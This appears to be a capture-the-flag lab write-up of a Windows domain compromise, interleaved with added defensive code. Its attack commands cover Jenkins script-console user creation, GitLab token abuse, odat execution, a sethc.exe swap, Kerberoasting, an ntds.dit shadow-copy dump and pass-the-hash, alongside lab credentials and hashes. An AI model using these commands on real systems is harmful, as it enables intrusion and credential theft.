春秋云镜-Privilege

Privilege

flag1

Information gathering

Directory scanning turns up a backup file, www.zip.

External foothold

Run the source through Seay (a PHP code auditor); together with the challenge description, this reveals an arbitrary file read:

```php
<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file exists.
if ( file_exists( $logfile ) ) {
    // Get the content and echo it.
    $text = file_get_contents( $logfile );
    echo( $text );
}
exit;
```

Trying to read the flag directly fails. (After getting RDP later and looking at the services phpStudy starts, it should have been readable.)

Following the hint, read the Jenkins password instead:
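The handler above takes whatever path the client supplies, URL-decodes it a second time (PHP has already decoded `$_GET`), and reads it. The following hardened counterpart is an added example written for this page in Python rather than PHP; it is not the challenge's code. `LOG_DIR`, the `.log` allow-list and the sample log are assumptions of the example. The fix is to decode once, canonicalise with `realpath`, and only then check that the result is still inside the intended directory:

```python
import os
from urllib.parse import unquote

# Directory the handler is meant to serve from (assumption for this example).
LOG_DIR = "/var/www/logs"


def resolve_log_path(base_dir, requested):
    """Return the canonical path for `requested` if it stays inside base_dir, else None.

    Like the vulnerable handler this URL-decodes the parameter once, but then it
    canonicalises (realpath) BEFORE the containment check, so "..", absolute
    paths and percent-encoded traversal all end up rejected.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:            # NUL truncates paths in C-based file APIs
        return None
    base = os.path.realpath(base_dir)
    # os.path.join drops `base` when `decoded` is absolute; realpath then shows
    # the result lies outside base and the prefix check below rejects it.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    if not candidate.endswith(".log"):  # extra allow-list: only log files
        return None
    return candidate


def read_log(requested, base_dir=LOG_DIR):
    """Hardened counterpart of the PHP handler: returns the file text or None."""
    path = resolve_log_path(base_dir, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def demo():
    """Self-contained check: serves one constructed log and probes traversal inputs."""
    import tempfile
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "app.log"), "w") as fh:
        fh.write("2024-01-10 INFO constructed sample line\n")
    probes = ["app.log", "sub/../app.log", "../../etc/passwd",
              "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd", "app.log%00.txt"]
    # True = served, False = refused
    return {p: read_log(p, base) is not None for p in probes}


if __name__ == "__main__":
    for probe, served in demo().items():
        print(f"{probe!r:32} -> {'served' if served else 'refused'}")
```

Checking `file_exists` alone, as the original does, proves nothing about where the file is; the containment check after canonicalisation is what closes the hole, and the `.log` suffix rule narrows it further.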

510235cf43f14e83b88a9f144199655b

Log in directly with:

admin

510235cf43f14e83b88a9f144199655b

Commands can be executed from /manage/script (the script console).

Reference: https://www.freebuf.com/articles/web/376186.html#/

Create a user and RDP in:

```groovy
println "net user dog qwer1234! /add".execute().text
println "net localgroup administrators dog /add".execute().text
```

flag2

Use fscan to gather information.

Internal network

172.22.14.7 local machine, already at the highest privilege

172.22.14.46 XR-0923

172.22.14.11 XR-DC, the domain controller

172.22.14.31 XR-ORACLE

172.22.14.16 GitLab

Gitlab API Token

Decrypt it in the Jenkins script console:

```groovy
println(hudson.util.Secret.fromString("Gitlab API Token").getPlainText())
```

```text
glpat-7kD_qLH2PiQv_ywB9hz2
```

List the GitLab projects with the API token:

```bash
proxychains curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
```

```json
[{
  "id": 6,
  "description": null,
  "name": "Internal Secret",
  "name_with_namespace": "XRLAB / Internal Secret",
  "path": "internal-secret",
  "path_with_namespace": "xrlab/internal-secret",
  "created_at": "2022-12-25T08:30:12.362Z",
  "default_branch": "main",
  "tag_list": [],
  "topics": [],
  "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
  "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
  "web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
  "readme_url": null,
  "avatar_url": null,
  "forks_count": 0,
  "star_count": 0,
  "last_activity_at": "2022-12-25T08:30:12.362Z",
  "namespace": {
    "id": 8,
    "name": "XRLAB",
    "path": "xrlab",
    "kind": "group",
    "full_path": "xrlab",
    "parent_id": null,
    "avatar_url": null,
    "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
  }
}, {
  "id": 4,
  "description": null,
  "name": "XRAdmin",
  "name_with_namespace": "XRLAB / XRAdmin",
  "path": "xradmin",
  "path_with_namespace": "xrlab/xradmin",
  "created_at": "2022-12-25T07:48:16.751Z",
  "default_branch": "main",
  "tag_list": [],
  "topics": [],
  "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
  "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
  "web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
  "readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
  "avatar_url": null,
  "forks_count": 0,
  "star_count": 0,
  "last_activity_at": "2023-05-30T10:27:31.762Z",
  "namespace": {
    "id": 8,
    "name": "XRLAB",
    "path": "xrlab",
    "kind": "group",
    "full_path": "xrlab",
    "parent_id": null,
    "avatar_url": null,
    "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
  }
}, {
  "id": 3,
  "description": null,
  "name": "Awenode",
  "name_with_namespace": "XRLAB / Awenode",
  "path": "awenode",
  "path_with_namespace": "xrlab/awenode",
  "created_at": "2022-12-25T07:46:43.635Z",
  "default_branch": "master",
  "tag_list": [],
  "topics": [],
  "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
  "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
  "web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
  "readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
  "avatar_url": null,
  "forks_count": 0,
  "star_count": 0,
  "last_activity_at": "2022-12-25T07:46:43.635Z",
  "namespace": {
    "id": 8,
    "name": "XRLAB",
    "path": "xrlab",
    "kind": "group",
    "full_path": "xrlab",
    "parent_id": null,
    "avatar_url": null,
    "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
  }
}, {
  "id": 2,
  "description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
  "name": "XRWiki",
  "name_with_namespace": "XRLAB / XRWiki",
  "path": "xrwiki",
  "path_with_namespace": "xrlab/xrwiki",
  "created_at": "2022-12-25T07:44:18.589Z",
  "default_branch": "master",
  "tag_list": [],
  "topics": [],
  "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
  "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
  "web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
  "readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
  "avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
  "forks_count": 0,
  "star_count": 0,
  "last_activity_at": "2022-12-25T07:44:18.589Z",
  "namespace": {
    "id": 8,
    "name": "XRLAB",
    "path": "xrlab",
    "kind": "group",
    "full_path": "xrlab",
    "parent_id": null,
    "avatar_url": null,
    "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
  }
}, {
  "id": 1,
  "description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
  "name": "Monitoring",
  "name_with_namespace": "GitLab Instance / Monitoring",
  "path": "Monitoring",
  "path_with_namespace": "gitlab-instance-23352f48/Monitoring",
  "created_at": "2022-12-25T07:18:20.914Z",
  "default_branch": "main",
  "tag_list": [],
  "topics": [],
  "ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
  "http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
  "web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
  "readme_url": null,
  "avatar_url": null,
  "forks_count": 0,
  "star_count": 0,
  "last_activity_at": "2022-12-25T07:18:20.914Z",
  "namespace": {
    "id": 2,
    "name": "GitLab Instance",
    "path": "gitlab-instance-23352f48",
    "kind": "group",
    "full_path": "gitlab-instance-23352f48",
    "parent_id": null,
    "avatar_url": null,
    "web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
  }
}]
```

Clone the projects:

```bash
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
```

In xradmin/ruoyi-admin/src/main/resources/application-druid.yml we find the Oracle username and password.
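Both pivots in this section come from secrets sitting in repositories: a personal access token that also ends up in clone URLs, and a database password committed in a config file. The scanner below is an added example (not the lab's or any project's code) of the kind of check a pre-commit or pre-receive hook runs; the file contents, token body, password value and host names are constructed for the example, and the three patterns are this example's own rather than a complete secret-detection rule set:

```python
import re

# Constructed repository snippets for this example (not the lab's real files).
# The yml mirrors the shape of a Spring/Druid datasource config such as
# application-druid.yml; the token and password values are made up.
SAMPLE_FILES = {
    "ruoyi-admin/src/main/resources/application-druid.yml": (
        "spring:\n"
        "  datasource:\n"
        "    druid:\n"
        "      master:\n"
        "        url: jdbc:oracle:thin:@db.example.lab:1521:ORCL\n"
        "        username: xradmin\n"
        "        password: S3cr3tExample!\n"
    ),
    "scripts/sync.sh": (
        "git clone http://gitlab.example.lab:glpat-ABCDEFGHIJKLMNOPQRST"
        "@172.22.14.16/xrlab/awenode.git\n"
    ),
    "README.md": (
        "Set DB_PASSWORD in the environment; never commit it.\n"
        "example: password: ${DB_PASSWORD}\n"
    ),
}

PATTERNS = [
    # GitLab personal access tokens: fixed prefix plus a 20-character body.
    ("gitlab_pat", re.compile(r"\bglpat-[A-Za-z0-9_-]{20}\b")),
    # user:secret@host embedded in a URL, e.g. a token baked into a clone URL.
    ("credential_in_url", re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.I)),
    # A literal YAML password value; ${VAR} and <placeholder> forms are allowed.
    ("yaml_password_literal", re.compile(r"^\s*password\s*:\s*(?!\$\{|<)\S+", re.I | re.M)),
]


def scan_text(path, text):
    """Return [(path, rule, line_no)] for every secret-like match in `text`."""
    findings = []
    for rule, rx in PATTERNS:
        for m in rx.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((path, rule, line_no))
    return findings


def scan_files(files):
    """Scan a {path: text} mapping, as a pre-receive or pre-commit hook would."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


if __name__ == "__main__":
    for path, rule, line_no in scan_files(SAMPLE_FILES):
        print(f"{path}:{line_no}: {rule}")
```

The README line is deliberately not flagged: a `${VAR}` reference is the shape a committed config should have. Scanning only the working tree is not enough once a secret has been pushed, since it survives in history; at that point the token or password has to be rotated, not just removed.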

Oracle

Use odat to connect to Oracle and run commands that create an administrator user:

```bash
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user dog qwer1234! /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators dog /add'
```

flag3&4

internal-secret contains a text file with a pile of account details; find the entry for XR-0923 in it:

XR-0923 (172.22.14.46)

zhangshuai

wSbEajHzZs

When trying RDP to XR-0923, it turns out this user belongs to the Remote Desktop Users and Remote Management Users groups, so evil-winrm works as well.

On a Windows system, LocalAccountTokenFilterPolicy defaults to 0. In that default state only the built-in Administrator account (SID 500) has credentials that can connect to the host remotely; other members of the local Administrators group get "Access denied". To connect as one of those other local administrators, the registry value LocalAccountTokenFilterPolicy must be set to 1.

In a domain environment, whether or not LocalAccountTokenFilterPolicy on the target is 1, every domain administrator has valid connection credentials: the target allows domain admins to connect to it over WinRM. There is one more case: an ordinary domain user that an administrator has added to the local Administrators group. Even with the value at 0 (disabled), such a user bypasses UAC by default, holds WinRM remote-connection credentials, and can connect successfully.

Reference: https://forum.butian.net/share/2080#/

```bash
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
```

SeRestorePrivilege privilege escalation

Modify service binaries

Overwrite DLLs used by system processes

Modify registry settings

Because the account holds SeRestorePrivilege, it can modify files and edit the registry regardless of their ACLs. Much like the Magnifier trick from an earlier challenge, we can rename cmd.exe to sethc.exe and then press Shift five times on the lock screen to launch sethc and get a shell (or replace utilman.exe and press Win+U on the lock screen).

An ACL (Access Control List) is the mechanism computer systems and networks use to manage access to resources. It defines which users, groups or system processes may access a given resource (files, directories, network resources, etc.) and which operations they may perform on it (read, write, execute, etc.).

```bat
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe
```

Grab the flag, then add an admin account and log back in:

```bat
net user dog qwer1234! /add
net localgroup administrators dog /add
```

RDP in again to get flag3.

Upload mimikatz and dump the NTLM hash:

b5a7f501c6626cf82b9d8a3dfe49fd66

Kerberoasting

Querying SPNs with the NTLM hash of XR-0923$ turns up a user named tianjing.

Enumerate the SPNs (Service Principal Names) registered in the domain:

```bash
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b5a7f501c6626cf82b9d8a3dfe49fd66' -dc-ip 172.22.14.11
```

Request the ticket hash:

```bash
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b5a7f501c6626cf82b9d8a3dfe49fd66' -dc-ip 172.22.14.11 -request-user tianjing
```

```text
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$4b61de3e3fc44ffbaf89ec2cd77d2bba$0b6b9f0aa0a5fba610cc9d0994e4b9223280d53f965c39f06ca9f1d92c836b263c661631c03bf9d87b025bf16c94ec9b65918eae88cec36c614322c4c4f627366ef1a10adfdc94b564e31203fcb3094c596419b3e837c44e8584ee751996f0437b08bbfe86e3faed3a809a3476a519ddeb2f3b7e3fc13567aa28a5ce2c722d7b1d660434a33e786baa5f86727b6e964f9b39123c3ad66b419ea821ee289dceefa8f34d7e219a1c466fd6f2a713d49936bc6fde71aa95dbb350676fa5aaf48f51f0ceaa04e437964a6e2bcd84d90d757e840f43d36b4efc3b5ca39908af1c633f3a330070e26f4ac04c585b787c154969f80f5a44d268a8887a7430ac7707a3e768450dad833cda6fb72aa8f86fb15ef898ad8d43c3622eb5871d7084de77f51c90003bed4ec0ab0ccb8304ccce01e6136fc17379eeb0a622c67a60faec1fa4d91865dce000e2e217cc450fc52566e98da13979232e6ac19e3f6b2f09431b639ca4358523a96268766b22178dc57d6001de2b86ed13b5754131f8e49125051870d49e0a962a8fa90444fae5e90a8ff7b38dc4c9dac7260f9674ad7ae62a6da645f0d0025c1067c1d53b86b93fdef955a18d0360d94596f76459f75e626ca11b239b02119d49e463a5815c4c32f90a878b051f0086a20a2229427444725e54e0b86f316835acdb10fef819870c0b18b110e20d7508a025552740136cf193f26542e4f31f93ce6b7951150537e8cb96a0fbf5722a4a50ec5ed1263c8310f36b41b3867ecd1abd4852b3cadecc7d86175de08377f48400768ebcffb193b2aa2272747c910f154e93d149b5f1c6146202aa38d291fb0740d84d3f7f9502eb8286cd1b1d267c06d93b66429f3181297e7b0e9240108bf59e8a0310d0a89fb1344039fb34e924d1d8b9393e9c6c07a6295aa39474656e16ad08726191e645c7ad774fd940278c69c0a57b4b10ae55e323f0bcf2eb50f06b61c7446a4f1bb1f997e187d5665f32e6292235735171478c9a185a4d70eae0b515fe3cf227217c48f8379236aa3ea27a9637fc7d8fed3c3013f678715b8444e6463ef6e497f5a070d223d15b8a3129a0fd853d8fab3f6b3463eca29eba2e724a933ee6b8dbf98884707743eb8e78b0a4dae52a334c79bfb9199cc5c46b8a7564416c659635f5cdafcef031d16b5ccdd4459f52a72597f7058dce909b163ed61014a019e2a73fe44f1e2187c12e5e4fea2da3fc2f6170daf165ae20d95e92aa3beaa10e5cf4398e2476dce8e44b8cbbb92c7506545f51202296492b65b18c24e82bf27e975de915e75a01b9f793b7b14ac1ed32f1b173ae9d7d1efdc896e14af09ba4528a505e823b5c5f8b952194076ed849ec052cf0ed9aa2a7cb2bf1c7242d819bf191c41cfe2caf05a2aa2a8756bb627719a09314194a0ac0f42237b85967597c8bf541bdfd478efc66d590b0a5e4888119bf878fc31ccc346c412b5ffeef2d
```

Save it as 1.txt and crack it with hashcat:

```bash
hashcat -m 13100 -a 0 1.txt rockyou.txt --force
```

```text
[krb5tgs hash as above, elided]:DPQSXSXgh2
```

tianjing

DPQSXSXgh2
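The `$krb5tgs$23$` prefix and hashcat mode 13100 both say the same thing: the service ticket was issued with RC4-HMAC (etype 0x17), which is what makes the offline crack feasible. On the domain controller that request is visible as Event ID 4769 with Ticket Encryption Type 0x17, and the usual detection is one account collecting RC4 tickets for several distinct services in a short window. The following is an added detection example, not part of the writeup and not any product's rule; the 4769 records are constructed (the service names `svc_sql` and `svc_http` and the users `alice` and `bob` are invented), and the window and threshold are example tuning values:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records in the shape of Event ID 4769 ("A Kerberos service ticket
# was requested") as a DC would log them; not captured from the lab.
# etype 0x17 is RC4-HMAC, the type behind $krb5tgs$23$ hashes (hashcat -m 13100);
# 0x12 is AES256, which a modern client normally requests.
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "account": "XR-0923$@XIAORANG.LAB", "service": "XR-DC$",   "etype": "0x12"},
    {"time": "2024-01-10T09:00:05", "account": "XR-0923$@XIAORANG.LAB", "service": "tianjing", "etype": "0x17"},
    {"time": "2024-01-10T09:00:06", "account": "XR-0923$@XIAORANG.LAB", "service": "svc_sql",  "etype": "0x17"},
    {"time": "2024-01-10T09:00:07", "account": "XR-0923$@XIAORANG.LAB", "service": "svc_http", "etype": "0x17"},
    {"time": "2024-01-10T09:15:00", "account": "alice@XIAORANG.LAB",    "service": "svc_sql",  "etype": "0x12"},
    {"time": "2024-01-10T11:00:00", "account": "bob@XIAORANG.LAB",      "service": "tianjing", "etype": "0x17"},
]


def detect_kerberoasting(events, window_minutes=10, min_services=3):
    """Return {account: sorted(services)} for accounts that requested RC4 (0x17)
    service tickets for at least `min_services` distinct services inside some
    `window_minutes` sliding window.

    Tickets for computer accounts (service name ending in '$') are ignored:
    their long random passwords are not crackable and are not what a
    Kerberoasting run asks for.
    """
    per_account = defaultdict(list)
    for e in events:
        if e["etype"] != "0x17" or e["service"].endswith("$"):
            continue
        per_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))

    window = timedelta(minutes=window_minutes)
    flagged = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            # Every RC4 request by this account within `window` of request i.
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                flagged[account] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_4769).items():
        print(f"{account}: RC4 tickets for {', '.join(services)}")
```

`bob` makes one RC4 request and stays below the threshold, which is the point of counting distinct services rather than alerting on every 0x17 ticket: legacy clients still produce those. The fix on the account side is to mark service accounts AES-only (msDS-SupportedEncryptionTypes) and give them long random passwords or make them group managed service accounts, so that a captured ticket is not worth cracking.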

```bash
proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
```

```bat
whoami /priv
```

The account holds the "Back up files and directories" and "Restore files and directories" privileges, so we can make a volume shadow copy and then read the SAM (here, ntds.dit) and SYSTEM.

The SAM (Security Account Manager) database holds the local users and groups, including their passwords and other attributes; it lives in the registry under HKLM\SAM.

ntds.dit is the file on a Windows domain controller that stores the Active Directory database: every user, computer and group in the domain, plus users' password hashes (NTLM and Kerberos keys).

SYSTEM is a Windows registry hive that contains the key material (the BootKey) needed to decrypt ntds.dit.
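The two `whoami /priv` checks in this writeup (SeRestorePrivilege on XR-0923, SeBackupPrivilege and SeRestorePrivilege on the DC) are the kind of thing worth automating on the defending side: which accounts hold privileges that bypass ACLs. The parser and audit below are an added example, not from the writeup; the `whoami /priv` output is constructed in the tool's real format, and the `HIGH_RISK` table is this example's own selection with its own one-line justifications, not an official list:

```python
import re

# Constructed sample in the format of `whoami /priv` output (not captured from the lab).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeMachineAccountPrivilege     Add workstations to domain           Disabled
SeBackupPrivilege             Back up files and directories        Enabled
SeRestorePrivilege            Restore files and directories        Enabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""

# Privileges that let the holder bypass ACLs or reach other security contexts.
# This selection and the reasons are the example's own (defender's view).
HIGH_RISK = {
    "SeBackupPrivilege": "read any file regardless of ACL (SAM, SYSTEM, ntds.dit via a shadow copy)",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL (service binaries, sethc.exe)",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate the tokens of connecting clients",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: enabled_bool} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def audit_privileges(text):
    """Return [(name, state, reason)] for every high-risk privilege the token holds.

    A privilege shown as Disabled is still present in the token and the process
    can enable it itself (AdjustTokenPrivileges), so both states are reported.
    """
    findings = []
    for name, enabled in parse_whoami_priv(text).items():
        if name in HIGH_RISK:
            findings.append((name, "Enabled" if enabled else "Disabled", HIGH_RISK[name]))
    return findings


if __name__ == "__main__":
    for name, state, reason in audit_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {reason}")
```

Run against output collected from the accounts that are allowed to log on remotely (here the members of Remote Management Users), it turns up exactly the cases the writeup exploits: a non-admin user that nonetheless holds backup and restore rights.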

Volume shadow copy

Create a file raj.dsh locally

with the contents:

```text
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
```

Use unix2dos to convert the .dsh file to Windows-compatible encoding and line endings:

```bash
unix2dos raj.dsh
```

Create a folder under the Windows root directory (because of permission problems elsewhere) and upload raj.dsh there.

Make the shadow copy:

```bat
diskshadow /s raj.dsh
```

Copy ntds.dit into the current directory, i.e. the folder we just created:

```bat
RoboCopy /b z:\windows\ntds . ntds.dit
```

Download the SAM (ntds.dit) and SYSTEM:

```text
download ntds.dit
```

Download SYSTEM:

```text
reg save HKLM\SYSTEM system
download system
```

Finally, decrypt the downloaded ntds.dit and SYSTEM locally:

```bash
impacket-secretsdump -ntds ntds.dit -system system local
```
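The chain just shown (`diskshadow /s`, `RoboCopy /b` of the ntds directory, `reg save HKLM\SYSTEM`) leaves three very distinctive process-creation events on the domain controller. The following is an added example of correlating them, not from the writeup and not a product's rule; the records are constructed in the shape of Security 4688 / Sysmon Event 1 fields (the XR-DC lines replay the commands above, the `alice` lines and the XR-ORACLE line are invented benign look-alikes), and the five patterns are this example's own:

```python
import re
from collections import defaultdict

# Constructed process-creation records carrying the fields a Security 4688 or
# Sysmon Event 1 record would have. The XR-DC lines replay this writeup's
# commands; the others are benign look-alikes.
SAMPLE_PROCESS_EVENTS = [
    {"host": "XR-DC",     "user": r"XIAORANG\tianjing",   "cmd": r"diskshadow /s raj.dsh"},
    {"host": "XR-DC",     "user": r"XIAORANG\tianjing",   "cmd": r"RoboCopy /b z:\windows\ntds . ntds.dit"},
    {"host": "XR-DC",     "user": r"XIAORANG\tianjing",   "cmd": r"reg save HKLM\SYSTEM system"},
    {"host": "XR-0923",   "user": r"XIAORANG\alice",      "cmd": r"robocopy C:\Projects D:\Backup\Projects /e /r:1"},
    {"host": "XR-0923",   "user": r"XIAORANG\alice",      "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
    {"host": "XR-ORACLE", "user": r"NT AUTHORITY\SYSTEM", "cmd": r"vssadmin list shadows"},
]

# Each rule matches one step of a shadow-copy credential-theft chain.
RULES = [
    ("shadow_copy_scripted", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I)),
    ("shadow_copy_created",  re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    ("backup_mode_copy",     re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b", re.I)),
    ("ntds_copy",            re.compile(r"\b(robocopy|xcopy|copy|esentutl)(\.exe)?\b.*\bntds\b", re.I)),
    ("hive_save",            re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SYSTEM|SAM|SECURITY)\b", re.I)),
]


def match_rules(cmd):
    """Names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def correlate(events, min_rules=2):
    """Return {host: sorted(rule_names)} for hosts hitting >= min_rules distinct rules.

    One rule on its own (a backup job using robocopy /b, an admin saving a hive)
    is routine; the shadow copy + ntds copy + hive save combination on one host
    is the credential-theft pattern.
    """
    per_host = defaultdict(set)
    for e in events:
        for rule in match_rules(e["cmd"]):
            per_host[e["host"]].add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_PROCESS_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

Command-line auditing (Security policy "Include command line in process creation events") has to be on for 4688 to carry the `cmd` field at all; without it only Sysmon or an EDR sees these arguments. Alerting on the DC alone keeps the rule quiet, since legitimate backup software on a DC normally does not drive `diskshadow` from a script file in a user's working directory.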

Pass-the-Hash to take the domain controller

PTH is short for Pass-the-Hash, an attack technique that authenticates with the NTLM hashes (or Kerberos keys) stored on Windows systems. Unlike ordinary password authentication, a PTH attack does not need the user's plaintext password; it uses the password hash directly.

```bash
proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
```

PS: GitHub Pages static sites do not allow pushing sensitive data such as API keys; this can be allowed under /security/secret-scanning.